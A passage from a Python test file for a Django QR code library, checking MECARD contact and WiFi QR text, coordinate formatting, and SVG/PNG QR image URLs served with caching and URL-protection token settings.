self.assertEqual(options.image_format, DEFAULT_IMAGE_FORMAT)
class TestContactDetail(SimpleTestCase):
def test_make_qr_code_text(self):
data = dict(**TEST_CONTACT_DETAIL)
c1 = ContactDetail(**data)
data['nickname'] = 'buddy'
c2 = ContactDetail(**data)
data['last_name'] = "O'Hara;,:"
data['tel_av'] = 'n/a'
c3 = ContactDetail(**data)
del data['last_name']
c4 = ContactDetail(**data)
self.assertEqual(c1.make_qr_code_text(), r'MECARD:N:Doe,John;SOUND:dOH,jAAn;TEL:+41769998877;EMAIL:j.doe@company.com;NOTE:Development Manager;BDAY:19851002;ADR:Cras des Fourches 987, 2800 Delémont, Jura, Switzerland;URL:http\://www.company.com;ORG:Company Ltd;;')
self.assertEqual(c2.make_qr_code_text(), r'MECARD:N:Doe,John;SOUND:dOH,jAAn;TEL:+41769998877;EMAIL:j.doe@company.com;NOTE:Development Manager;BDAY:19851002;ADR:Cras des Fourches 987, 2800 Delémont, Jura, Switzerland;URL:http\://www.company.com;NICKNAME:buddy;ORG:Company Ltd;;')
self.assertEqual(c3.make_qr_code_text(),
r"MECARD:N:O'Hara\;\,\:,John;SOUND:dOH,jAAn;TEL:+41769998877;TEL-AV:n/a;EMAIL:j.doe@company.com;NOTE:Development Manager;BDAY:19851002;ADR:Cras des Fourches 987, 2800 Delémont, Jura, Switzerland;URL:http\://www.company.com;NICKNAME:buddy;ORG:Company Ltd;;")
self.assertEqual(c4.make_qr_code_text(),
r"MECARD:N:John;SOUND:dOH,jAAn;TEL:+41769998877;TEL-AV:n/a;EMAIL:j.doe@company.com;NOTE:Development Manager;BDAY:19851002;ADR:Cras des Fourches 987, 2800 Delémont, Jura, Switzerland;URL:http\://www.company.com;NICKNAME:buddy;ORG:Company Ltd;;")
class TestWifiConfig(SimpleTestCase):
def test_make_qr_code_text(self):
wifi1 = WifiConfig(**TEST_WIFI_CONFIG)
wifi2 = WifiConfig(hidden=True, **TEST_WIFI_CONFIG)
self.assertEqual(wifi1.make_qr_code_text(), 'WIFI:S:my-wifi;T:WPA;P:wifi-password;;')
self.assertEqual(wifi2.make_qr_code_text(), 'WIFI:S:my-wifi;T:WPA;P:wifi-password;H:true;;')
class TestCoordinates(SimpleTestCase):
def test_coordinates(self):
c1 = Coordinates(latitude=586000.32, longitude=250954.19)
c2 = Coordinates(latitude=586000.32, longitude=250954.19, altitude=500)
self.assertEqual(c1.__str__(), 'latitude: 586000.32, longitude: 250954.19')
self.assertEqual(c2.__str__(), 'latitude: 586000.32, longitude: 250954.19, altitude: 500')
@override_settings()
class TestQRUrlFromTextResult(SimpleTestCase):
"""
Ensures that serving images representing QR codes works as expected (with or without caching, and with or without
protection against external requests).
"""
svg_result = b'<?xml version=\'1.0\' encoding=\'UTF-8\'?>\n<svg height="2.9mm" version="1.1" viewBox="0 0 2.9 2.9" width="2.9mm" xmlns="http://www.w3.org/2000/svg"><path d="M 2 1 L 2 1.1 L 2.1 1.1 L 2.1 1 z M 1.8 2.1 L 1.8 2.2 L 1.9 2.2 L 1.9 2.1 z M 1.6 0.5 L 1.6 0.6 L 1.7 0.6 L 1.7 0.5 z M 1.4 2.1 L 1.4 2.2 L 1.5 2.2 L 1.5 2.1 z M 0.4 2.4 L 0.4 2.5 L 0.5 2.5 L 0.5 2.4 z M 2 1.3 L 2 1.4 L 2.1 1.4 L 2.1 1.3 z M 1.8 0.8 L 1.8 0.9 L 1.9 0.9 L 1.9 0.8 z M 2.2 0.8 L 2.2 0.9 L 2.3 0.9 L 2.3 0.8 z M 1.7 2.1 L 1.7 2.2 L 1.8 2.2 L 1.8 2.1 z M 0.5 1 L 0.5 1.1 L 0.6 1.1 L 0.6 1 z M 0.4 1.4 L 0.4 1.5 L 0.5 1.5 L 0.5 1.4 z M 2.2 2.3 L 2.2 2.4 L 2.3 2.4 L 2.3 2.3 z M 1.2 0.9 L 1.2 1.0 L 1.3 1.0 L 1.3 0.9 z M 0.9 1.2 L 0.9 1.3 L 1.0 1.3 L 1.0 1.2 z M 0.8 0.4 L 0.8 0.5 L 0.9 0.5 L 0.9 0.4 z M 1.4 1.2 L 1.4 1.3 L 1.5 1.3 L 1.5 1.2 z M 1.3 0.4 L 1.3 0.5 L 1.4 0.5 L 1.4 0.4 z M 1.4 1.1 L 1.4 1.2 L 1.5 1.2 L 1.5 1.1 z M 2 0.7 L 2 0.8 L 2.1 0.8 L 2.1 0.7 z M 1 1.4 L 1 1.5 L 1.1 1.5 L 1.1 1.4 z M 1.6 1 L 1.6 1.1 L 1.7 1.1 L 1.7 1 z M 2.3 1.8 L 2.3 1.9 L 2.4 1.9 L 2.4 1.8 z M 2.1 0.6 L 2.1 0.7 L 2.2 0.7 L 2.2 0.6 z M 0.4 2.1 L 0.4 2.2 L 0.5 2.2 L 0.5 2.1 z M 1.8 0.5 L 1.8 0.6 L 1.9 0.6 L 1.9 0.5 z M 2.4 1.3 L 2.4 1.4 L 2.5 1.4 L 2.5 1.3 z M 2.2 1.3 L 2.2 1.4 L 2.3 1.4 L 2.3 1.3 z M 0.4 0.8 L 0.4 0.9 L 0.5 0.9 L 0.5 0.8 z M 2.4 0.8 L 2.4 0.9 L 2.5 0.9 L 2.5 0.8 z M 1.2 1.9 L 1.2 2.0 L 1.3 2.0 L 1.3 1.9 z M 0.8 1.4 L 0.8 1.5 L 0.9 1.5 L 0.9 1.4 z M 0.7 0.6 L 0.7 0.7 L 0.8 0.7 L 0.8 0.6 z M 0.6 1 L 0.6 1.1 L 0.7 1.1 L 0.7 1 z M 1.3 1.8 L 1.3 1.9 L 1.4 1.9 L 1.4 1.8 z M 1.2 0.6 L 1.2 0.7 L 1.3 0.7 L 1.3 0.6 z M 1 0.4 L 1 0.5 L 1.1 0.5 L 1.1 0.4 z M 0.8 2 L 0.8 2.1 L 0.9 2.1 L 0.9 2 z M 1.5 0.4 L 1.5 0.5 L 1.6 0.5 L 1.6 0.4 z M 1.3 2 L 1.3 2.1 L 1.4 2.1 L 1.4 2 z M 2 0.4 L 2 0.5 L 2.1 0.5 L 2.1 0.4 z M 2.1 1.7 L 2.1 1.8 L 2.2 1.8 L 2.2 1.7 z M 2 2.3 L 2 2.4 L 2.1 2.4 L 2.1 2.3 z M 1.8 0.6 L 1.8 0.7 L 1.9 0.7 L 1.9 0.6 z M 1.7 1.4 L 1.7 1.5 L 1.8 1.5 L 1.8 1.4 z M 0.6 2.1 L 0.6 2.2 L 0.7 2.2 L 0.7 2.1 z M 2.2 1.4 L 2.2 1.5 L 2.3 1.5 L 2.3 1.4 z M 0.4 0.5 L 0.4 0.6 L 0.5 0.6 L 0.5 0.5 z M 0.5 1.6 L 0.5 1.7 L 0.6 1.7 L 0.6 1.6 z M 1.2 1.6 L 1.2 1.7 L 1.3 1.7 L 1.3 1.6 z M 0.9 1.8 L 0.9 1.9 L 1.0 1.9 L 1.0 1.8 z M 0.7 2.2 L 0.7 2.3 L 0.8 2.3 L 0.8 2.2 z M 1.2 2.2 L 1.2 2.3 L 1.3 2.3 L 1.3 2.2 z M 1.5 1.9 L 1.5 2.0 L 1.6 2.0 L 1.6 1.9 z M 1.3 2.3 L 1.3 2.4 L 1.4 2.4 L 1.4 2.3 z M 1.9 2 L 1.9 2.1 L 2.0 2.1 L 2.0 2 z M 1.8 1.2 L 1.8 1.3 L 1.9 1.3 L 1.9 1.2 z M 1 2 L 1 2.1 L 1.1 2.1 L 1.1 2 z M 1.6 1.2 L 1.6 1.3 L 1.7 1.3 L 1.7 1.2 z M 2.4 2 L 2.4 2.1 L 2.5 2.1 L 2.5 2 z M 2.2 0.4 L 2.2 0.5 L 2.3 0.5 L 2.3 0.4 z M 2.1 1.2 L 2.1 1.3 L 2.2 1.3 L 2.2 1.2 z M 2.4 0.7 L 2.4 0.8 L 2.5 0.8 L 2.5 0.7 z M 0.6 2.2 L 0.6 2.3 L 0.7 2.3 L 0.7 2.2 z M 2.2 1.9 L 2.2 2.0 L 2.3 2.0 L 2.3 1.9 z M 0.4 1.8 L 0.4 1.9 L 0.5 1.9 L 0.5 1.8 z M 0.6 1.6 L 0.6 1.7 L 0.7 1.7 L 0.7 1.6 z M 0.7 2.1 L 0.7 2.2 L 0.8 2.2 L 0.8 2.1 z M 1 1.8 L 1 1.9 L 1.1 1.9 L 1.1 1.8 z M 1.5 1.4 L 1.5 1.5 L 1.6 1.5 L 1.6 1.4 z M 2.1 1 L 2.1 1.1 L 2.2 1.1 L 2.2 1 z M 1.8 0.9 L 1.8 1.0 L 1.9 1.0 L 1.9 0.9 z M 1.6 1.7 L 1.6 1.8 L 1.7 1.8 L 1.7 1.7 z M 2.1 1.5 L 2.1 1.6 L 2.2 1.6 L 2.2 1.5 z M 1.9 0.4 L 1.9 0.5 L 2.0 0.5 L 2.0 0.4 z M 2.4 0.4 L 2.4 0.5 L 2.5 0.5 L 2.5 0.4 z M 0.4 1.5 L 0.4 1.6 L 0.5 1.6 L 0.5 1.5 z M 0.7 1 L 0.7 1.1 L 0.8 1.1 L 0.8 1 z M 0.6 0.6 L 0.6 0.7 L 0.7 0.7 L 0.7 0.6 z M 0.5 1.4 L 0.5 1.5 L 0.6 1.5 L 0.6 1.4 z M 1.2 1 L 1.2 1.1 L 1.3 1.1 L 1.3 1 z M 1.3 1.1 L 1.3 1.2 L 1.4 1.2 L 1.4 1.1 z M 1 0.8 L 1 0.9 L 1.1 0.9 L 1.1 0.8 z M 1.5 0.8 L 1.5 0.9 L 1.6 
0.9 L 1.6 0.8 z M 1.4 0.8 L 1.4 0.9 L 1.5 0.9 L 1.5 0.8 z M 1.3 2.4 L 1.3 2.5 L 1.4 2.5 L 1.4 2.4 z M 2 0.8 L 2 0.9 L 2.1 0.9 L 2.1 0.8 z M 1.6 1.1 L 1.6 1.2 L 1.7 1.2 L 1.7 1.1 z M 0.4 2.2 L 0.4 2.3 L 0.5 2.3 L 0.5 2.2 z M 1.8 1 L 1.8 1.1 L 1.9 1.1 L 1.9 1 z M 1.6 2.2 L 1.6 2.3 L 1.7 2.3 L 1.7 2.2 z M 2.2 1 L 2.2 1.1 L 2.3 1.1 L 2.3 1 z M 0.4 0.9 L 0.4 1.0 L 0.5 1.0 L 0.5 0.9 z M 1.7 2.3 L 1.7 2.4 L 1.8 2.4 L 1.8 2.3 z M 2.4 0.9 L 2.4 1.0 L 2.5 1.0 L 2.5 0.9 z M 0.5 0.4 L 0.5 0.5 L 0.6 0.5 L 0.6 0.4 z M 0.4 1.2 L 0.4 1.3 L 0.5 1.3 L 0.5 1.2 z M 1.3 1.7 L 1.3 1.8 L 1.4 1.8 L 1.4 1.7 z M 1.2 0.7 L 1.2 0.8 L 1.3 0.8 L 1.3 0.7 z M 0.8 1 L 0.8 1.1 L 0.9 1.1 L 0.9 1 z M 1 0.5 L 1 0.6 L 1.1 0.6 L 1.1 0.5 z M 0.8 2.1 L 0.8 2.2 L 0.9 2.2 L 0.9 2.1 z M 1.8 1.6 L 1.8 1.7 L 1.9 1.7 L 1.9 1.6 z M 0.9 2.4 L 0.9 2.5 L 1.0 2.5 L 1.0 2.4 z M 1.6 0.8 L 1.6 0.9 L 1.7 0.9 L 1.7 0.8 z M 1 2.4 L 1 2.5 L 1.1 2.5 L 1.1 2.4 z M 1.4 2.4 L 1.4 2.5 L 1.5 2.5 L 1.5 2.4 z M 1.5 2.4 L 1.5 2.5 L 1.6 2.5 L 1.6 2.4 z M 1.9 1.3 L 1.9 1.4 L 2.0 1.4 L 2.0 1.3 z M 1.8 0.7 L 1.8 0.8 L 1.9 0.8 L 1.9 0.7 z M 1.7 1.3 L 1.7 1.4 L 1.8 1.4 L 1.8 1.3 z M 2 2.4 L 2 2.5 L 2.1 2.5 L 2.1 2.4 z M 2.2 1.5 L 2.2 1.6 L 2.3 1.6 L 2.3 1.5 z M 0.4 0.6 L 0.4 0.7 L 0.5 0.7 L 0.5 0.6 z M 2.1 2.1 L 2.1 2.2 L 2.2 2.2 L 2.2 2.1 z M 1.2 1.7 L 1.2 1.8 L 1.3 1.8 L 1.3 1.7 z M 0.8 1.2 L 0.8 1.3 L 0.9 1.3 L 0.9 1.2 z M 0.7 0.4 L 0.7 0.5 L 0.8 0.5 L 0.8 0.4 z M 0.6 1.2 L 0.6 1.3 L 0.7 1.3 L 0.7 1.2 z M 1.3 1.2 L 1.3 1.3 L 1.4 1.3 L 1.4 1.2 z M 1.4 1.9 L 1.4 2.0 L 1.5 2.0 L 1.5 1.9 z M 1 0.6 L 1 0.7 L 1.1 0.7 L 1.1 0.6 z M 1.3 2.2 L 1.3 2.3 L 1.4 2.3 L 1.4 2.2 z M 1.8 1.3 L 1.8 1.4 L 1.9 1.4 L 1.9 1.3 z M 1 2.1 L 1 2.2 L 1.1 2.2 L 1.1 2.1 z M 1.6 1.3 L 1.6 1.4 L 1.7 1.4 L 1.7 1.3 z M 0.5 2.4 L 0.5 2.5 L 0.6 2.5 L 0.6 2.4 z M 2.1 1.9 L 2.1 2.0 L 2.2 2.0 L 2.2 1.9 z M 2 2.1 L 2 2.2 L 2.1 2.2 L 2.1 2.1 z M 1.7 1.6 L 1.7 1.7 L 1.8 1.7 L 1.8 1.6 z M 2.4 1.6 L 2.4 1.7 L 2.5 1.7 L 2.5 1.6 z M 1.6 2.4 L 1.6 2.5 L 1.7 2.5 L 1.7 2.4 z M 0.4 1.9 L 0.4 2.0 L 0.5 2.0 L 0.5 1.9 z M 0.7 1.4 L 0.7 1.5 L 0.8 1.5 L 0.8 1.4 z M 0.5 1.8 L 0.5 1.9 L 0.6 1.9 L 0.6 1.8 z M 1.3 1.5 L 1.3 1.6 L 1.4 1.6 L 1.4 1.5 z M 0.9 0.4 L 0.9 0.5 L 1.0 0.5 L 1.0 0.4 z M 0.7 2 L 0.7 2.1 L 0.8 2.1 L 0.8 2 z M 1.4 0.4 L 1.4 0.5 L 1.5 0.5 L 1.5 0.4 z M 1.2 2 L 1.2 2.1 L 1.3 2.1 L 1.3 2 z M 1 1.9 L 1 2.0 L 1.1 2.0 L 1.1 1.9 z M 2 1.5 L 2 1.6 L 2.1 1.6 L 2.1 1.5 z M 1.8 1.4 L 1.8 1.5 L 1.9 1.5 L 1.9 1.4 z M 1 2.2 L 1 2.3 L 1.1 2.3 L 1.1 2.2 z M 1.6 1.8 L 1.6 1.9 L 1.7 1.9 L 1.7 1.8 z M 2.3 1 L 2.3 1.1 L 2.4 1.1 L 2.4 1 z M 2.2 0.6 L 2.2 0.7 L 2.3 0.7 L 2.3 0.6 z M 2.1 1.4 L 2.1 1.5 L 2.2 1.5 L 2.2 1.4 z M 1.7 1.9 L 1.7 2.0 L 1.8 2.0 L 1.8 1.9 z M 2.4 0.5 L 2.4 0.6 L 2.5 0.6 L 2.5 0.5 z M 0.6 2.4 L 0.6 2.5 L 0.7 2.5 L 0.7 2.4 z M 0.7 1.3 L 0.7 1.4 L 0.8 1.4 L 0.8 1.3 z M 0.6 0.7 L 0.6 0.8 L 0.7 0.8 L 0.7 0.7 z M 1.2 1.1 L 1.2 1.2 L 1.3 1.2 L 1.3 1.1 z M 0.8 0.6 L 0.8 0.7 L 0.9 0.7 L 0.9 0.6 z M 0.6 1.8 L 0.6 1.9 L 0.7 1.9 L 0.7 1.8 z M 1 0.9 L 1 1.0 L 1.1 1.0 L 1.1 0.9 z M 1.5 1.1 L 1.5 1.2 L 1.6 1.2 L 1.6 1.1 z M 1.4 0.9 L 1.4 1.0 L 1.5 1.0 L 1.5 0.9 z M 1 1.2 L 1 1.3 L 1.1 1.3 L 1.1 1.2 z M 1.8 2 L 1.8 2.1 L 1.9 2.1 L 1.9 2 z M 2.3 2 L 2.3 2.1 L 2.4 2.1 L 2.4 2 z M 2.1 0.4 L 2.1 0.5 L 2.2 0.5 L 2.2 0.4 z M 2 1.2 L 2 1.3 L 2.1 1.3 L 2.1 1.2 z M 0.4 2.3 L 0.4 2.4 L 0.5 2.4 L 0.5 2.3 z M 1.6 2.3 L 1.6 2.4 L 1.7 2.4 L 1.7 2.3 z M 0.4 1 L 0.4 1.1 L 0.5 1.1 L 0.5 1 z M 1.9 1 L 1.9 1.1 L 2.0 1.1 L 2.0 1 z M 2.4 1 L 2.4 1.1 L 2.5 1.1 L 2.5 1 z M 2.2 2.2 L 2.2 2.3 L 2.3 2.3 L 2.3 2.2 z M 0.7 0.8 L 0.7 0.9 L 
0.8 0.9 L 0.8 0.8 z M 0.6 0.8 L 0.6 0.9 L 0.7 0.9 L 0.7 0.8 z M 1.3 1.6 L 1.3 1.7 L 1.4 1.7 L 1.4 1.6 z M 1.2 0.8 L 1.2 0.9 L 1.3 0.9 L 1.3 0.8 z M 1.4 1.5 L 1.4 1.6 L 1.5 1.6 L 1.5 1.5 z M 1 1 L 1 1.1 L 1.1 1.1 L 1.1 1 z M 0.9 1 L 0.9 1.1 L 1.0 1.1 L 1.0 1 z M 0.8 2.2 L 0.8 2.3 L 0.9 2.3 L 0.9 2.2 z M 1.5 0.6 L 1.5 0.7 L 1.6 0.7 L 1.6 0.6 z M 1.4 1 L 1.4 1.1 L 1.5 1.1 L 1.5 1 z M 2 0.6 L 2 0.7 L 2.1 0.7 L 2.1 0.6 z M 1.6 0.9 L 1.6 1.0 L 1.7 1.0 L 1.7 0.9 z M 2.1 0.7 L 2.1 0.8 L 2.2 0.8 L 2.2 0.7 z M 1.9 1.2 L 1.9 1.3 L 2.0 1.3 L 2.0 1.2 z M 1.8 0.4 L 1.8 0.5 L 1.9 0.5 L 1.9 0.4 z M 0.4 2 L 0.4 2.1 L 0.5 2.1 L 0.5 2 z M 1.6 2 L 1.6 2.1 L 1.7 2.1 L 1.7 2 z M 2.3 0.4 L 2.3 0.5 L 2.4 0.5 L 2.4 0.4 z M 2.2 1.2 L 2.2 1.3 L 2.3 1.3 L 2.3 1.2 z M 0.4 0.7 L 0.4 0.8 L 0.5 0.8 L 0.5 0.7 z M 0.7 1.8 L 0.7 1.9 L 0.8 1.9 L 0.8 1.8 z M 0.8 1.3 L 0.8 1.4 L 0.9 1.4 L 0.9 1.3 z M 0.7 0.7 L 0.7 0.8 L 0.8 0.8 L 0.8 0.7 z M 0.6 1.3 L 0.6 1.4 L 0.7 1.4 L 0.7 1.3 z M 1.3 1.9 L 1.3 2.0 L 1.4 2.0 L 1.4 1.9 z M 0.9 1.6 L 0.9 1.7 L 1.0 1.7 L 1.0 1.6 z M 0.8 0.8 L 0.8 0.9 L 0.9 0.9 L 0.9 0.8 z M 0.7 2.4 L 0.7 2.5 L 0.8 2.5 L 0.8 2.4 z M 1.4 1.6 L 1.4 1.7 L 1.5 1.7 L 1.5 1.6 z M 1.2 2.4 L 1.2 2.5 L 1.3 2.5 L 1.3 2.4 z M 1 0.7 L 1 0.8 L 1.1 0.8 L 1.1 0.7 z M 1.3 2.1 L 1.3 2.2 L 1.4 2.2 L 1.4 2.1 z M 1.9 2.2 L 1.9 2.3 L 2.0 2.3 L 2.0 2.2 z M 1.8 1.8 L 1.8 1.9 L 1.9 1.9 L 1.9 1.8 z M 2.3 1.4 L 2.3 1.5 L 2.4 1.5 L 2.4 1.4 z M 1.9 1.9 L 1.9 2.0 L 2.0 2.0 L 2.0 1.9 z M 1.7 1.5 L 1.7 1.6 L 1.8 1.6 L 1.8 1.5 z M 0.6 2 L 0.6 2.1 L 0.7 2.1 L 0.7 2 z M 0.4 0.4 L 0.4 0.5 L 0.5 0.5 L 0.5 0.4 z M 2.1 2.3 L 2.1 2.4 L 2.2 2.4 L 2.2 2.3 z M 0.8 1.8 L 0.8 1.9 L 0.9 1.9 L 0.9 1.8 z M 1.4 0.5 L 1.4 0.6 L 1.5 0.6 L 1.5 0.5 z M 1.2 2.1 L 1.2 2.2 L 1.3 2.2 L 1.3 2.1 z M 1 1.6 L 1 1.7 L 1.1 1.7 L 1.1 1.6 z M 1.8 2.4 L 1.8 2.5 L 1.9 2.5 L 1.9 2.4 z M 0.8 2.4 L 0.8 2.5 L 0.9 2.5 L 0.9 2.4 z M 1.5 1.6 L 1.5 1.7 L 1.6 1.7 L 1.6 1.6 z M 2.3 2.4 L 2.3 2.5 L 2.4 2.5 L 2.4 2.4 z M 2.1 0.8 L 2.1 0.9 L 2.2 0.9 L 2.2 0.8 z M 1.1 1.3 L 1.1 1.4 L 1.2 1.4 L 1.2 1.3 z M 1.9 2.1 L 1.9 2.2 L 2.0 2.2 L 2.0 2.1 z M 1 2.3 L 1 2.4 L 1.1 2.4 L 1.1 2.3 z M 1.6 1.9 L 1.6 2.0 L 1.7 2.0 L 1.7 1.9 z M 2.2 0.7 L 2.2 0.8 L 2.3 0.8 L 2.3 0.7 z M 2.1 1.3 L 2.1 1.4 L 2.2 1.4 L 2.2 1.3 z M 2.4 0.6 L 2.4 0.7 L 2.5 0.7 L 2.5 0.6 z M 2.2 1.8 L 2.2 1.9 L 2.3 1.9 L 2.3 1.8 z M 0.7 1.2 L 0.7 1.3 L 0.8 1.3 L 0.8 1.2 z M 0.6 0.4 L 0.6 0.5 L 0.7 0.5 L 0.7 0.4 z M 0.8 0.7 L 0.8 0.8 L 0.9 0.8 L 0.9 0.7 z M 1.3 0.9 L 1.3 1.0 L 1.4 1.0 L 1.4 0.9 z" id="qr-path" style="fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:none" /></svg>'
png_result = b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x1d\x00\x00\x00\x1d\x01\x00\x00\x00\x00~\xe8Z\xa2\x00\x00\x00\x83IDATx\x9cm\xcd1\x0e\x01Q\x10\x80\xe1\x7f\xc6&:j\x07\x90,\x9db\x0f q\x0e\x8e \x91H\x88\x08\xb7\xa0\xd3ju.\xa0\xd7\x8aj[\x95e\x937\x13\xd6Sj4_\xfbI\x04W\x80\x1fI\x91\xee\x8fZ?\xed\xd0j>A\x11P\xaa5Z[6P\x1f\xe4\x10\xef+\xa3l\xf5\x8d\xf7Xf<\x86[#\xf8\xc1\xc47\xcd\x0b\xf1\xb90-\xd2\x1c\xc2\xb9cR\x8e^\xdd\x84O6U\xf4\x06\xe1\xda3\xf5\xac\x8d\xfc\xc9\xbfO\x8703\xef(\x96\xc2\x00\x00\x00\x00IEND\xaeB`\x82'
def test_svg_url(self):
for cache_enabled in [True, False]:
url1 = make_qr_code_url(TEST_TEXT, QRCodeOptions(size=1), cache_enabled=cache_enabled)
url2 = qr_url_from_text(TEST_TEXT, size=1, cache_enabled=cache_enabled)
url3 = qr_url_from_text(TEST_TEXT, image_format='svg', size=1, cache_enabled=cache_enabled)
url4 = qr_url_from_text(TEST_TEXT, image_format='SVG', size=1, cache_enabled=cache_enabled)
url5 = qr_url_from_text(TEST_TEXT, options=QRCodeOptions(image_format='SVG', size=1), cache_enabled=cache_enabled)
# Using an invalid image format should fall back to SVG.
url6 = qr_url_from_text(TEST_TEXT, image_format='invalid-format-name', size=1, cache_enabled=cache_enabled)
url = url1
token_regex = re.compile(r"token=.+&?")
urls = list(map(lambda x: token_regex.sub('', x), (url1, url2, url3, url4, url5, url6)))
self.assertEqual(urls[0], urls[1])
self.assertEqual(urls[0], urls[2])
self.assertEqual(urls[0], urls[3])
self.assertEqual(urls[0], urls[4])
self.assertEqual(urls[0], urls[5])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, TestQRUrlFromTextResult.svg_result)
def test_png_url(self):
for cache_enabled in [True, False]:
url1 = make_qr_code_url(TEST_TEXT, QRCodeOptions(image_format='png', size=1), cache_enabled=cache_enabled)
url2 = qr_url_from_text(TEST_TEXT, image_format='png', size=1, cache_enabled=cache_enabled)
url3 = qr_url_from_text(TEST_TEXT, image_format='PNG', size=1, cache_enabled=cache_enabled)
url4 = qr_url_from_text(TEST_TEXT, options=QRCodeOptions(image_format='PNG', size=1), cache_enabled=cache_enabled)
url = url1
token_regex = re.compile(r"token=.+&?")
urls = list(map(lambda x: token_regex.sub('', x), (url1, url2, url3, url4)))
self.assertEqual(urls[0], urls[1])
self.assertEqual(urls[0], urls[2])
self.assertEqual(urls[0], urls[3])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, TestQRUrlFromTextResult.png_result)
@override_settings(CACHES=OVERRIDE_CACHES_SETTING, QR_CODE_CACHE_ALIAS=None)
def test_svg_with_cache_but_no_alias(self):
self.test_svg_url()
@override_settings(CACHES=OVERRIDE_CACHES_SETTING)
def test_png_with_cache(self):
self.test_png_url()
@override_settings(CACHES=OVERRIDE_CACHES_SETTING, QR_CODE_CACHE_ALIAS=None)
def test_png_with_cache_but_no_alias(self):
self.test_png_url()
@override_settings(QR_CODE_URL_PROTECTION=dict(TOKEN_LENGTH=30, SIGNING_KEY='my-secret-signing-key',
SIGNING_SALT='my-signing-salt',
ALLOWS_EXTERNAL_REQUESTS_FOR_REGISTERED_USER=True))
def test_with_url_protection_settings_1(self):
self.test_svg_url()
self.test_png_url()
response = self.client.get(make_qr_code_url(TEST_TEXT, include_url_protection_token=False, cache_enabled=False))
# Registered users can access the URL externally, but since we are not logged in, we must expect an HTTP 403.
self.assertEqual(response.status_code, 403)
@override_settings(QR_CODE_URL_PROTECTION=dict(ALLOWS_EXTERNAL_REQUESTS_FOR_REGISTERED_USER=False))
def test_with_url_protection_settings_2(self):
self.test_svg_url()
self.test_png_url()
response = self.client.get(make_qr_code_url(TEST_TEXT, include_url_protection_token=False, cache_enabled=False))
self.assertEqual(response.status_code, 403)
@override_settings(QR_CODE_URL_PROTECTION=dict(ALLOWS_EXTERNAL_REQUESTS_FOR_REGISTERED_USER=lambda user: False))
def test_with_url_protection_settings_3(self):
self.test_svg_url()
self.test_png_url()
response = self.client.get(make_qr_code_url(TEST_TEXT, include_url_protection_token=False, cache_enabled=False))
self.assertEqual(response.status_code, 403)
@override_settings(QR_CODE_URL_PROTECTION=dict(ALLOWS_EXTERNAL_REQUESTS_FOR_REGISTERED_USER=lambda user: True))
def test_with_url_protection_settings_4(self):
self.test_svg_url()
self.test_png_url()
response = self.client.get(make_qr_code_url(TEST_TEXT, include_url_protection_token=False, cache_enabled=False))
# The callable for ALLOWS_EXTERNAL_REQUESTS_FOR_REGISTERED_USER always returns True, even for anonymous users.
# Therefore, we must expect an HTTP 200.
self.assertEqual(response.status_code, 200)
def test_svg_error_correction(self):
for correction_level in ERROR_CORRECTION_DICT:
print('Testing SVG URL with error correction: %s' % correction_level)
url1 = make_qr_code_url(COMPLEX_TEST_TEXT, QRCodeOptions(error_correction=correction_level), cache_enabled=False)
url2 = qr_url_from_text(COMPLEX_TEST_TEXT, error_correction=correction_level, cache_enabled=False)
url3 = qr_url_from_text(COMPLEX_TEST_TEXT, error_correction=correction_level, image_format='svg', cache_enabled=False)
url4 = qr_url_from_text(COMPLEX_TEST_TEXT, error_correction=correction_level, image_format='SVG', cache_enabled=False)
url5 = qr_url_from_text(COMPLEX_TEST_TEXT, options=QRCodeOptions(error_correction=correction_level, image_format='SVG'), cache_enabled=False)
# Using an invalid image format should fall back to SVG.
url6 = qr_url_from_text(COMPLEX_TEST_TEXT, error_correction=correction_level, image_format='invalid-format-name', cache_enabled=False)
url = url1
token_regex = re.compile(r"token=.+&?")
urls = list(map(lambda x: token_regex.sub('', x), (url1, url2, url3, url4, url5, url6)))
self.assertEqual(urls[0], urls[1])
self.assertEqual(urls[0], urls[2])
self.assertEqual(urls[0], urls[3])
self.assertEqual(urls[0], urls[4])
self.assertEqual(urls[0], urls[5])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
source_image_data = response.content.decode('utf-8')
# Skip header and adjust tag format.
source_image_data = source_image_data[source_image_data.index('\n') + 1:]
source_image_data = _make_closing_path_tag(source_image_data)
ref_image_data = get_svg_content_from_file_name('qrfromtextsvgresult_error_correction_%s%s' % (correction_level.lower(), SVG_REF_SUFFIX), skip_header=False)
self.assertEqual(source_image_data, ref_image_data)
def test_png_error_correction(self):
for correction_level in ERROR_CORRECTION_DICT:
print('Testing PNG URL with error correction: %s' % correction_level)
url1 = make_qr_code_url(COMPLEX_TEST_TEXT, QRCodeOptions(error_correction=correction_level, image_format='png'), cache_enabled=False)
url2 = make_qr_code_url(COMPLEX_TEST_TEXT, QRCodeOptions(error_correction=correction_level, image_format='PNG'), cache_enabled=False)
url3 = qr_url_from_text(COMPLEX_TEST_TEXT, error_correction=correction_level, image_format='png', cache_enabled=False)
url4 = qr_url_from_text(COMPLEX_TEST_TEXT, error_correction=correction_level, image_format='PNG', cache_enabled=False)
url5 = qr_url_from_text(COMPLEX_TEST_TEXT, options=QRCodeOptions(error_correction=correction_level, image_format='PNG'), cache_enabled=False)
url = url1
token_regex = re.compile(r"token=.+&?")
urls = list(map(lambda x: token_regex.sub('', x), (url1, url2, url3, url4, url5)))
self.assertEqual(urls[0], urls[1])
self.assertEqual(urls[0], urls[2])
self.assertEqual(urls[0], urls[3])
self.assertEqual(urls[0], urls[4])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
source_image_data = response.content
ref_image_data = get_png_content_from_file_name('qrfromtextpngresult_error_correction_%s%s' % (correction_level.lower(), PNG_REF_SUFFIX))
self.assertEqual(source_image_data, ref_image_data)
class TestQRFromTextSvgResult(SimpleTestCase):
"""
Ensures that produced QR codes in SVG format coincide with verified references.
The tests cover direct calls to the tag function, rendering of the tag, and direct calls to the qr_code API.
"""
def test_size(self):
sizes = ['t', 'T', 's', 'S', None, -1, 0, 'm', 'M', 'l', 'L', 'h', 'H', '6', 6, '8', 8]
